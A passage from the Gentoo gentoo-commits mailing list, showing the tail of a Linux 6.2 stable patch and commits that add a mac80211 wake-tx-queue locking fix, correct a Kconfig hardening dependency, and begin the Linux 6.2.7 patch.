+ 		if (req.link_id >= 0)
+ 			return -EINVAL;
+ 
+-		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs,
+-					    &bssid);
++		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs);
+ 		if (IS_ERR(req.bss))
+ 			return PTR_ERR(req.bss);
++		ap_addr = req.bss->bssid;
+ 	}
+ 
+ 	err = nl80211_crypto_settings(rdev, info, &req.crypto, 1);
+@@ -10968,7 +10966,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			dev->ieee80211_ptr->conn_owner_nlportid =
+ 				info->snd_portid;
+ 			memcpy(dev->ieee80211_ptr->disconnect_bssid,
+-			       bssid, ETH_ALEN);
++			       ap_addr, ETH_ALEN);
+ 		}
+ 
+ 		wdev_unlock(dev->ieee80211_ptr);
+diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
+index 00afe831c71c4..f238048bf786e 100644
+--- a/net/xfrm/xfrm_state.c
++++ b/net/xfrm/xfrm_state.c
+@@ -2815,11 +2815,6 @@ int __xfrm_init_state(struct xfrm_state *x, bool init_replay, bool offload,
+ 			goto error;
+ 		}
+ 
+-		if (!(inner_mode->flags & XFRM_MODE_FLAG_TUNNEL)) {
+-			NL_SET_ERR_MSG(extack, "Only tunnel modes can accommodate an AF_UNSPEC selector");
+-			goto error;
+-		}
+-
+ 		x->inner_mode = *inner_mode;
+ 
+ 		if (x->props.family == AF_INET)
+diff --git a/scripts/kconfig/confdata.c b/scripts/kconfig/confdata.c
+index b7c9f1dd5e422..992575f1e9769 100644
+--- a/scripts/kconfig/confdata.c
++++ b/scripts/kconfig/confdata.c
+@@ -1226,10 +1226,12 @@ static void (*conf_changed_callback)(void);
+ 
+ void conf_set_changed(bool val)
+ {
+-	if (conf_changed_callback && conf_changed != val)
+-		conf_changed_callback();
++	bool changed = conf_changed != val;
+ 
+ 	conf_changed = val;
++
++	if (conf_changed_callback && changed)
++		conf_changed_callback();
+ }
+ 
+ bool conf_get_changed(void)
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index ae31bb1275940..317bdf6dcbef4 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -472,6 +472,15 @@ static const struct config_entry config_table[] = {
+ 	},
+ #endif
+ 
++/* Meteor Lake */
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_METEORLAKE)
++	/* Meteorlake-P */
++	{
++		.flags = FLAG_SOF | FLAG_SOF_ONLY_IF_DMIC_OR_SOUNDWIRE,
++		.device = 0x7e28,
++	},
++#endif
++
+ };
+ 
+ static const struct config_entry *snd_intel_dsp_find_config
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 81c4a45254ff2..77a592f219472 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -328,14 +328,15 @@ enum {
+ #define needs_eld_notify_link(chip)	false
+ #endif
+ 
+-#define CONTROLLER_IN_GPU(pci) (((pci)->device == 0x0a0c) || \
++#define CONTROLLER_IN_GPU(pci) (((pci)->vendor == 0x8086) &&         \
++				       (((pci)->device == 0x0a0c) || \
+ 					((pci)->device == 0x0c0c) || \
+ 					((pci)->device == 0x0d0c) || \
+ 					((pci)->device == 0x160c) || \
+ 					((pci)->device == 0x490d) || \
+ 					((pci)->device == 0x4f90) || \
+ 					((pci)->device == 0x4f91) || \
+-					((pci)->device == 0x4f92))
++					((pci)->device == 0x4f92)))
+ 
+ #define IS_BXT(pci) ((pci)->vendor == 0x8086 && (pci)->device == 0x5a98)
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d4819890374b5..28ac6c159b2a2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9446,6 +9446,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+@@ -9538,6 +9539,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc830, "Samsung Galaxy Book Ion (NT950XCJ-X716A)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc832, "Samsung Galaxy Book Flex Alpha (NP730QCJ)", ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET),
+ 	SND_PCI_QUIRK(0x144d, 0xca03, "Samsung Galaxy Book2 Pro 360 (NP930QED)", ALC298_FIXUP_SAMSUNG_AMP),
++	SND_PCI_QUIRK(0x144d, 0xc868, "Samsung Galaxy Book2 Pro (NP930XED)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x1458, 0xfa53, "Gigabyte BXBT-2807", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb120, "MSI Cubi MS-B120", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb171, "Cubi N 8GL (MS-B171)", ALC283_FIXUP_HEADSET_MIC),
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 56ee5fef66a8b..28dd2046e4ac5 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -559,7 +559,7 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 	{
+ 		.comp_ids = &essx_83x6,
+ 		.drv_name = "sof-essx8336",
+-		.sof_tplg_filename = "sof-adl-es83x6", /* the tplg suffix is added at run time */
++		.sof_tplg_filename = "sof-adl-es8336", /* the tplg suffix is added at run time */
+ 		.tplg_quirk_mask = SND_SOC_ACPI_TPLG_INTEL_SSP_NUMBER |
+ 					SND_SOC_ACPI_TPLG_INTEL_SSP_MSB |
+ 					SND_SOC_ACPI_TPLG_INTEL_DMIC_NUMBER,
+diff --git a/sound/soc/qcom/qdsp6/q6prm.c b/sound/soc/qcom/qdsp6/q6prm.c
+index 8aa1a213bfb75..c1dc5bae715a0 100644
+--- a/sound/soc/qcom/qdsp6/q6prm.c
++++ b/sound/soc/qcom/qdsp6/q6prm.c
+@@ -183,9 +183,9 @@ int q6prm_set_lpass_clock(struct device *dev, int clk_id, int clk_attr, int clk_
+ 			  unsigned int freq)
+ {
+ 	if (freq)
+-		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ 
+-	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ }
+ EXPORT_SYMBOL_GPL(q6prm_set_lpass_clock);
+ 
+diff --git a/sound/soc/sof/intel/pci-apl.c b/sound/soc/sof/intel/pci-apl.c
+index 69279dcc92dc1..aff6cb573c270 100644
+--- a/sound/soc/sof/intel/pci-apl.c
++++ b/sound/soc/sof/intel/pci-apl.c
+@@ -78,6 +78,7 @@ static const struct sof_dev_desc glk_desc = {
+ 	.nocodec_tplg_filename = "sof-glk-nocodec.tplg",
+ 	.ops = &sof_apl_ops,
+ 	.ops_init = sof_apl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-cnl.c b/sound/soc/sof/intel/pci-cnl.c
+index 8db3f8d15b55e..4c0c1c369dcd8 100644
+--- a/sound/soc/sof/intel/pci-cnl.c
++++ b/sound/soc/sof/intel/pci-cnl.c
+@@ -48,6 +48,7 @@ static const struct sof_dev_desc cnl_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc cfl_desc = {
+@@ -111,6 +112,7 @@ static const struct sof_dev_desc cml_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-icl.c b/sound/soc/sof/intel/pci-icl.c
+index d6cf75e357dbf..6785669113b3c 100644
+--- a/sound/soc/sof/intel/pci-icl.c
++++ b/sound/soc/sof/intel/pci-icl.c
+@@ -79,6 +79,7 @@ static const struct sof_dev_desc jsl_desc = {
+ 	.nocodec_tplg_filename = "sof-jsl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-mtl.c b/sound/soc/sof/intel/pci-mtl.c
+index 6e4e6d4ef5a56..b183dc0014b4b 100644
+--- a/sound/soc/sof/intel/pci-mtl.c
++++ b/sound/soc/sof/intel/pci-mtl.c
+@@ -46,6 +46,7 @@ static const struct sof_dev_desc mtl_desc = {
+ 	.nocodec_tplg_filename = "sof-mtl-nocodec.tplg",
+ 	.ops = &sof_mtl_ops,
+ 	.ops_init = sof_mtl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-skl.c b/sound/soc/sof/intel/pci-skl.c
+index 3a99dc444f92e..5b4bccf819658 100644
+--- a/sound/soc/sof/intel/pci-skl.c
++++ b/sound/soc/sof/intel/pci-skl.c
+@@ -38,6 +38,7 @@ static struct sof_dev_desc skl_desc = {
+ 	.nocodec_tplg_filename = "sof-skl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static struct sof_dev_desc kbl_desc = {
+@@ -61,6 +62,7 @@ static struct sof_dev_desc kbl_desc = {
+ 	.nocodec_tplg_filename = "sof-kbl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-tgl.c b/sound/soc/sof/intel/pci-tgl.c
+index e80c4dfef85a5..22e769e0831d9 100644
+--- a/sound/soc/sof/intel/pci-tgl.c
++++ b/sound/soc/sof/intel/pci-tgl.c
+@@ -48,6 +48,7 @@ static const struct sof_dev_desc tgl_desc = {
+ 	.nocodec_tplg_filename = "sof-tgl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc tglh_desc = {
+@@ -110,6 +111,7 @@ static const struct sof_dev_desc ehl_desc = {
+ 	.nocodec_tplg_filename = "sof-ehl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adls_desc = {
+@@ -141,6 +143,7 @@ static const struct sof_dev_desc adls_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_desc = {
+@@ -172,6 +175,7 @@ static const struct sof_dev_desc adl_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_n_desc = {
+@@ -203,6 +207,7 @@ static const struct sof_dev_desc adl_n_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpls_desc = {
+@@ -234,6 +239,7 @@ static const struct sof_dev_desc rpls_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpl_desc = {
+@@ -265,6 +271,7 @@ static const struct sof_dev_desc rpl_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 0aa87a8add5d3..2363a7cc0b57d 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -46,7 +46,7 @@
+ #define SOF_IPC4_NODE_INDEX_INTEL_SSP(x) (((x) & 0xf) << 4)
+ 
+ /* Node ID for DMIC type DAI copiers */
+-#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) (((x) & 0x7) << 5)
++#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) ((x) & 0x7)
+ 
+ #define SOF_IPC4_GAIN_ALL_CHANNELS_MASK 0xffffffff
+ #define SOF_IPC4_VOL_ZERO_DB	0x7fffffff
+diff --git a/tools/testing/selftests/amd-pstate/Makefile b/tools/testing/selftests/amd-pstate/Makefile
+index 5fd1424db37d8..c382f579fe94a 100644
+--- a/tools/testing/selftests/amd-pstate/Makefile
++++ b/tools/testing/selftests/amd-pstate/Makefile
+@@ -4,10 +4,15 @@
+ # No binaries, but make sure arg-less "make" doesn't trigger "run_tests"
+ all:
+ 
+-uname_M := $(shell uname -m 2>/dev/null || echo not)
+-ARCH ?= $(shell echo $(uname_M) | sed -e s/i.86/x86/ -e s/x86_64/x86/)
++ARCH ?= $(shell uname -m 2>/dev/null || echo not)
++ARCH := $(shell echo $(ARCH) | sed -e s/i.86/x86/ -e s/x86_64/x86/)
+ 
+-TEST_PROGS := run.sh
+-TEST_FILES := basic.sh tbench.sh gitsource.sh
++ifeq (x86,$(ARCH))
++TEST_FILES += ../../../power/x86/amd_pstate_tracer/amd_pstate_trace.py
++TEST_FILES += ../../../power/x86/intel_pstate_tracer/intel_pstate_tracer.py
++endif
++
++TEST_PROGS += run.sh
++TEST_FILES += basic.sh tbench.sh gitsource.sh
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index f7900e75d2306..05400462c7799 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -10,12 +10,14 @@ endif
+ CLANG_TARGET_FLAGS_arm          := arm-linux-gnueabi
+ CLANG_TARGET_FLAGS_arm64        := aarch64-linux-gnu
+ CLANG_TARGET_FLAGS_hexagon      := hexagon-linux-musl
++CLANG_TARGET_FLAGS_i386         := i386-linux-gnu
+ CLANG_TARGET_FLAGS_m68k         := m68k-linux-gnu
+ CLANG_TARGET_FLAGS_mips         := mipsel-linux-gnu
+ CLANG_TARGET_FLAGS_powerpc      := powerpc64le-linux-gnu
+ CLANG_TARGET_FLAGS_riscv        := riscv64-linux-gnu
+ CLANG_TARGET_FLAGS_s390         := s390x-linux-gnu
+ CLANG_TARGET_FLAGS_x86          := x86_64-linux-gnu
++CLANG_TARGET_FLAGS_x86_64       := x86_64-linux-gnu
+ CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
+ 
+ ifeq ($(CROSS_COMPILE),)
+diff --git a/tools/testing/selftests/net/devlink_port_split.py b/tools/testing/selftests/net/devlink_port_split.py
+index 2b5d6ff873738..2d84c7a0be6b2 100755
+--- a/tools/testing/selftests/net/devlink_port_split.py
++++ b/tools/testing/selftests/net/devlink_port_split.py
+@@ -59,6 +59,8 @@ class devlink_ports(object):
+         assert stderr == ""
+         ports = json.loads(stdout)['port']
+ 
++        validate_devlink_output(ports, 'flavour')
++
+         for port in ports:
+             if dev in port:
+                 if ports[port]['flavour'] == 'physical':
+@@ -220,6 +222,27 @@ def split_splittable_port(port, k, lanes, dev):
+     unsplit(port.bus_info)
+ 
+ 
++def validate_devlink_output(devlink_data, target_property=None):
++    """
++    Determine if test should be skipped by checking:
++      1. devlink_data contains values
++      2. The target_property exist in devlink_data
++    """
++    skip_reason = None
++    if any(devlink_data.values()):
++        if target_property:
++            skip_reason = "{} not found in devlink output, test skipped".format(target_property)
++            for key in devlink_data:
++                if target_property in devlink_data[key]:
++                    skip_reason = None
++    else:
++        skip_reason = 'devlink output is empty, test skipped'
++
++    if skip_reason:
++        print(skip_reason)
++        sys.exit(KSFT_SKIP)
++
++
+ def make_parser():
+     parser = argparse.ArgumentParser(description='A test for port splitting.')
+     parser.add_argument('--dev',
+@@ -240,12 +263,9 @@ def main(cmdline=None):
+         stdout, stderr = run_command(cmd)
+         assert stderr == ""
+ 
++        validate_devlink_output(json.loads(stdout))
+         devs = json.loads(stdout)['dev']
+-        if devs:
+-            dev = list(devs.keys())[0]
+-        else:
+-            print("no devlink device was found, test skipped")
+-            sys.exit(KSFT_SKIP)
++        dev = list(devs.keys())[0]
+ 
+     cmd = "devlink dev show %s" % dev
+     stdout, stderr = run_command(cmd)
+@@ -255,6 +275,7 @@ def main(cmdline=None):
+ 
+     ports = devlink_ports(dev)
+ 
++    found_max_lanes = False
+     for port in ports.if_names:
+         max_lanes = get_max_lanes(port.name)
+ 
+@@ -277,6 +298,11 @@ def main(cmdline=None):
+                 split_splittable_port(port, lane, max_lanes, dev)
+ 
+                 lane //= 2
++        found_max_lanes = True
++
++    if not found_max_lanes:
++        print(f"Test not started, no port of device {dev} reports max_lanes")
++        sys.exit(KSFT_SKIP)
+ 
+ 
+ if __name__ == "__main__":


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-22 12:44 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-22 12:44 UTC (permalink / raw
  To: gentoo-commits

commit:     55b9f20a7c652003a1c0d85db1c8e9081437b6dc
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 22 12:44:07 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar 22 12:44:07 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=55b9f20a

wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue

Bug: https://bugs.gentoo.org/902715

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...-serialize-ieee80211-handle-wake-tx-queue.patch | 84 ++++++++++++++++++++++
 2 files changed, 88 insertions(+)

diff --git a/0000_README b/0000_README
index e2a4cc67..110a64f7 100644
--- a/0000_README
+++ b/0000_README
@@ -87,6 +87,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
+Desc:   wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch b/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
new file mode 100644
index 00000000..ed730a0a
--- /dev/null
+++ b/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
@@ -0,0 +1,84 @@
+From 007ae9b268ba7553e479608cf9735d3c4672a2ab Mon Sep 17 00:00:00 2001
+From: Alexander Wetzel <alexander@wetzel-home.de>
+Date: Tue, 14 Mar 2023 22:11:22 +0100
+Subject: wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
+
+ieee80211_handle_wake_tx_queue must not run concurrent multiple times.
+It calls ieee80211_txq_schedule_start() and the drivers migrated to iTXQ
+do not expect overlapping drv_tx() calls.
+
+This fixes 'c850e31f79f0 ("wifi: mac80211: add internal handler for
+wake_tx_queue")', which introduced ieee80211_handle_wake_tx_queue.
+Drivers started to use it with 'a790cc3a4fad ("wifi: mac80211: add
+wake_tx_queue callback to drivers")'.
+But only after fixing an independent bug with
+'4444bc2116ae ("wifi: mac80211: Proper mark iTXQs for resumption")'
+problematic concurrent calls really happened and exposed the initial
+issue.
+
+Fixes: c850e31f79f0 ("wifi: mac80211: add internal handler for wake_tx_queue")
+Reported-by: Thomas Mann <rauchwolke@gmx.net>
+Link: https://bugzilla.kernel.org/show_bug.cgi?id=217119
+Link: https://lore.kernel.org/r/b8efebc6-4399-d0b8-b2a0-66843314616b@leemhuis.info/
+Link: https://lore.kernel.org/r/b7445607128a6b9ed7c17fcdcf3679bfaf4aaea.camel@sipsolutions.net>
+CC: <stable@vger.kernel.org>
+Signed-off-by: Alexander Wetzel <alexander@wetzel-home.de>
+Link: https://lore.kernel.org/r/20230314211122.111688-1-alexander@wetzel-home.de
+[add missing spin_lock_init() noticed by Felix]
+Signed-off-by: Johannes Berg <johannes.berg@intel.com>
+---
+ net/mac80211/ieee80211_i.h | 3 +++
+ net/mac80211/main.c        | 2 ++
+ net/mac80211/util.c        | 3 +++
+ 3 files changed, 8 insertions(+)
+
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index ecc232eb1ee82..e082582e0aa28 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1284,6 +1284,9 @@ struct ieee80211_local {
+ 	struct list_head active_txqs[IEEE80211_NUM_ACS];
+ 	u16 schedule_round[IEEE80211_NUM_ACS];
+ 
++	/* serializes ieee80211_handle_wake_tx_queue */
++	spinlock_t handle_wake_tx_queue_lock;
++
+ 	u16 airtime_flags;
+ 	u32 aql_txq_limit_low[IEEE80211_NUM_ACS];
+ 	u32 aql_txq_limit_high[IEEE80211_NUM_ACS];
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 846528850612a..ddf2b7811c557 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -802,6 +802,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 	local->aql_threshold = IEEE80211_AQL_THRESHOLD;
+ 	atomic_set(&local->aql_total_pending_airtime, 0);
+ 
++	spin_lock_init(&local->handle_wake_tx_queue_lock);
++
+ 	INIT_LIST_HEAD(&local->chanctx_list);
+ 	mutex_init(&local->chanctx_mtx);
+ 
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 1a28fe5cb614f..3aceb3b731bf4 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -314,6 +314,8 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(txq->vif);
+ 	struct ieee80211_txq *queue;
+ 
++	spin_lock(&local->handle_wake_tx_queue_lock);
++
+ 	/* Use ieee80211_next_txq() for airtime fairness accounting */
+ 	ieee80211_txq_schedule_start(hw, txq->ac);
+ 	while ((queue = ieee80211_next_txq(hw, txq->ac))) {
+@@ -321,6 +323,7 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 		ieee80211_return_txq(hw, queue, false);
+ 	}
+ 	ieee80211_txq_schedule_end(hw, txq->ac);
++	spin_unlock(&local->handle_wake_tx_queue_lock);
+ }
+ EXPORT_SYMBOL(ieee80211_handle_wake_tx_queue);
+ 
+-- 
+cgit 


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-21 13:32 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-21 13:32 UTC (permalink / raw
  To: gentoo-commits

commit:     e27a3bae2be6d57dff9df453cf9a94feff41e1eb
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Mar 21 12:58:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Mar 21 13:32:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e27a3bae

Fix config change from X86_X32 to X86_X32_ABI

Thanks to Frank Limpert

Bug: https://bugs.gentoo.org/902443

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 9e0701dd..9cb1eb0c 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -185,7 +185,7 @@
 +config GENTOO_KERNEL_SELF_PROTECTION_COMMON
 +	bool "Enable Kernel Self Protection Project Recommendations"
 +
-+	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32 && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
++	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32_ABI && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
 +
 +	select BUG
 +	select STRICT_KERNEL_RWX


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-17 10:42 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-17 10:42 UTC (permalink / raw
  To: gentoo-commits

commit:     ccdee9668ab77080ab6207ee330310b3f14a0d86
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 17 10:42:16 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 17 10:42:16 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ccdee966

Linux patch 6.2.7

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 1006_linux-6.2.7.patch | 5559 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5563 insertions(+)

diff --git a/0000_README b/0000_README
index d40230d0..e2a4cc67 100644
--- a/0000_README
+++ b/0000_README
@@ -67,6 +67,10 @@ Patch:  1005_linux-6.2.6.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.6
 
+Patch:  1006_linux-6.2.7.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.7
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1006_linux-6.2.7.patch b/1006_linux-6.2.7.patch
new file mode 100644
index 00000000..174f612d
--- /dev/null
+++ b/1006_linux-6.2.7.patch
@@ -0,0 +1,5559 @@
+diff --git a/Makefile b/Makefile
+index 70e66e7716086..43cf2c785cb1f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 6
++SUBLEVEL = 7
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/alpha/kernel/module.c b/arch/alpha/kernel/module.c
+index 5b60c248de9ea..cbefa5a773846 100644
+--- a/arch/alpha/kernel/module.c
++++ b/arch/alpha/kernel/module.c
